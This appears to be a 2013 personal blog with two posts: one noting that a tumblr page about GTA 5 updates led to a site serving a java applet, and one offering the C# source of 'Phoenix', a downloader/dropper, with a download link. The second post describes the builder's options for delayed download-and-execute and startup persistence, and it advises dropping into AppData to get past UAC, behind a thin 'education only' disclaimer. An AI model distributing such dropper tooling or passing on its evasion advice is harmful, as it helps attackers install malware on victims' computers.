tisdag 19 februari 2013

Abusing tumblr to spread malware

A friend kindly shared this link with me http://gta5updates.tumblr.com/,
then after that we go to http://tumblr.comlu.com/...

and pie, there is a java applet


Pretty fun to see that tumblr can be abused like that, i have never seen it before...
How ever for reporting a tumblr a mail is fine (that nice)
http://tumblring.net/how-to-report-people-on-tumblr-for-abuse/

tisdag 12 februari 2013

Phoenix Downloader source code C#

Since i have now lately made up my mind and decided to start learning C++,
I also decided to clean up some off the massive source code in C# i have.

Phoenix is a basic downloader/dropper, that attempt to download a file and drop it one the hard-drive. 

The builder GUI is very straight forward,
You choose if you want to delay the process of downloading and executing, and it also offer to add start up for the dropped file.

I recommend using App data instead off System 32, for a higher success since appdata is more UAC friendly then system 32.

Please don't miss use it only use it for education usage :).
Credit: CaptainBri

Download: http://www.sendspace.com/file/pvljpc
You will need a program such as 7zip to unpack...